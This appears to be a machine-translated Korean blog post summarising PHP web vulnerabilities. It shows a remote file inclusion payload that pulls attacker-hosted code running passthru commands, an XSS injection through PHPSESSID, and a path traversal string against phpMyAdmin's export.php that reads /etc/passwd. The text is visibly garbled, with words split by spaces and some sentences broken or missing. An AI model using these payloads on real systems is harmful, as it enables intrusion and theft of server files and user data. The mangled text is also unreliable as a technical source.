PHP 스 크 립 트 사이트 에 존재 하 는 빈틈 요약

원본: http://xiaomutou.51.net/ciker/blog/  
현재 의 네트워크 보안 을 보면 가장 많은 관심 과 접촉 을 가 진 WEB 페이지 의 구멍 은 ASP 일 것 입 니 다.이 방면 에서 소 죽 은 전문가 입 니 다.저 는 발언권 이 없습니다.그러나 PHP 방면 에서 도 심각 한 안전 문제 가 존재 하지만 이 방면 의 글 은 많 지 않 습 니 다.여기 서 여러분 과 PHP 페이지 의 관련 구멍 에 대해 조금 토론 해 보 겠 습 니 다.  
저 는 현재 흔히 볼 수 있 는 PHP 구멍 에 대해 정리 해 보 았 습 니 다.크게 다음 과 같은 몇 가지 로 나 눌 수 있 습 니 다.파일 구멍,스 크 립 트 명령 실행 구멍,파일 유출 구멍,SQL 주입 구멍 등 몇 가지 가 있 습 니 다.물론 COOKIE 사기 등 일부 통용 되 는 기술 은 여기 서 토론 하지 않 습 니 다.이런 자료 들 은 인터넷 에 도 많 습 니 다.그러면 이 구멍 들 을 어떻게 이용 하 는 지 하나씩 분석 해 보 겠 습 니 다!  
우선,파일 구멍 을 포함 하 는 것 에 대해 토론 합 니 다.이 구멍 은 PHP 만 의 것 이 라 고 할 수 있 습 니 다.외부 에서 제공 하 는 악성 데 이 터 를 충분히 처리 하지 못 해서 원 격 공격 자 들 은 이 구멍 을 이용 하여 WEB 프로 세 스 권한 으로 시스템 에서 임의의 명령 을 수행 할 수 있 습 니 다.예 를 들 어 a.php 에 이러한 코드 가 있다 고 가정 합 니 다.  
include($include."/xxx.php");  
?>  
이 코드 에서$include 는 일반적으로 설 정 된 경로 이지 만,우 리 는 스스로 경 로 를 만들어 공격 의 목적 을 달성 할 수 있 습 니 다.예 를 들 어 우리 가 제출 한:a.php?include=http://web/b.php이 웹 은 우리 가 공격 하 는 공간 입 니 다.물론 b.php 는 우리 가 공격 하 는 코드 입 니 다.우 리 는 b.php 에 passthru("/bin/ls"와 유사 하 게 쓸 수 있 습 니 다. /etc");의 코드.이렇게 하면 목적 있 는 공격 을 수행 할 수 있 습 니 다. Store Front,  
HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart 등등.  
이 어 스 크 립 트 명령 실행 구멍 을 살 펴 보 겠 습 니 다.이 는 사용자 가 제출 한 URI 매개 변수 에 대한 충분 한 필터 가 부족 하기 때 문 입 니 다.악성 HTML 코드 가 포 함 된 데 이 터 를 제출 하면 크로스 스 크 립 트 공격 을 촉발 하여 대상 사용자 의 민감 한 정 보 를 얻 을 수 있 습 니 다.우리 도 예 를 들 어 PHP 에서 투명 한 PHP PHP 4.3.1 다음 버 전의 index.php 페이지 는 PHPSESSID 에 대한 충분 한 필터 가 부족 합 니 다.우 리 는 이러한 코드 를 통 해 공격 의 목적 을 달성 할 수 있 습 니 다.  
http://web/index.php?PHPSESSID=">script 에서 우 리 는 함 수 를 구성 하여 사용자 의 민감 한 정 보 를 얻 을 수 있 습 니 다.이 구멍 은 PHP 를 제외 하고 상대 적 으로 적 습 니 다. 투명 성 외 에 도 PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP 보드 등등.  
그 다음 에 파일 이 새 는 구멍 을 살 펴 보 겠 습 니 다.이러한 구멍 은 사용자 가 제출 한 매개 변수 에 대한 충분 한 여과 가 부족 하기 때문에 원 격 공격 자 는 이 를 이용 하여 디 렉 터 리 를 옮 겨 다 니 며 공격 하고 민감 한 정 보 를 얻 을 수 있 습 니 다.최근 에 발 견 된 phpMyAdmin 을 예 로 들 어 보 겠 습 니 다.phpMyAdmin 에서 export.php 페이지 는 사용자 가 제출 한'what'인 자 를 충분히 필터 하지 않 았 습 니 다.원 격 공격 자 는 여러 개의'../'문 자 를 포함 하 는 데 이 터 를 제출 하면 WEB 를 돌아 갈 수 있 습 니 다. ROOT 는 WEB 권한 으로 시스템 의 임의의 파일 정 보 를 볼 수 있 도록 제한 합 니 다.예 를 들 어 다음 주 소 를 입력 하 십시오:export.php?what=../../../../../../../../etc/passwd

좋은 웹페이지 즐겨찾기